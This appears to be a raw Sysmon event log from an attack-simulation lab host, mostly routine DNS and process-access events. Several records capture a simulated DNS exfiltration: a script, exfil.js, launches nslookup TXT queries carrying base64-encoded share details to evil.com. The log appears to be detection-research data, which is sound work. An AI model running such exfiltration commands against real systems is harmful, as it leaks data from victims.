process>-udptruefalse127.0.0.1-52548-false127.0.0.1-53domain 354300x8000000000000000198888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52547- 354300x8000000000000000198887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52546- 354300x8000000000000000198886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.942{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52545- 354300x8000000000000000198885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-52544-false127.0.0.1-53domain 354300x8000000000000000198884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52544- 354300x8000000000000000198883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-52544-false127.0.0.1-53domain 354300x8000000000000000198882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-52543-false127.0.0.1-53domain 354300x8000000000000000198881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52543- 354300x8000000000000000198880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-52543-false127.0.0.1-53domain 354300x8000000000000000198879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-52542-false127.0.0.1-53domain 354300x8000000000000000198878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52542- 354300x8000000000000000198877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.853{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-52542-false127.0.0.1-53domain 354300x8000000000000000198876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.780{00000000-0000-0000-0000-000000000000}3976<unknown process>-udpfalsefalse127.0.0.1-52541-false127.0.0.1-53domain 354300x8000000000000000198875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52541- 354300x8000000000000000198874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{00000000-0000-0000-0000-000000000000}3976<unknown process>-udptruefalse127.0.0.1-52541-false127.0.0.1-53domain 354300x8000000000000000198873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.779{00000000-0000-0000-0000-000000000000}3976<unknown process>-udpfalsefalse127.0.0.1-52540-false127.0.0.1-53domain 10341000x8000000000000000198872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.319{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D63F-000000005F02}2444C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.319{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D63F-000000005F02}2444C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.319{2E1864BB-17BA-629A-D63F-000000005F02}24444760C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-D53F-000000005F02}7376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D63F-000000005F02}2444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D53F-000000005F02}7376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-17A1-629A-783D-000000005F02}55527284C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-D53F-000000005F02}7376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.309{2E1864BB-17BA-629A-D53F-000000005F02}7376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhmwqur.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.303{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfrez.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.282{2E1864BB-17BA-629A-D33F-000000005F02}78965740C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-D43F-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.266{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.266{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.266{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.266{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.266{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D43F-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.266{2E1864BB-17BA-629A-D23F-000000005F02}6856708C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-D43F-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.279{2E1864BB-17BA-629A-D43F-000000005F02}1188C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-D23F-000000005F02}6856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfrez.tmp 2>&1 10341000x8000000000000000198852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.250{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D33F-000000005F02}7896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.250{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D33F-000000005F02}7896C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.250{2E1864BB-17BA-629A-D33F-000000005F02}78965740C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-D23F-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.235{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D33F-000000005F02}7896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.235{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.235{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.235{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 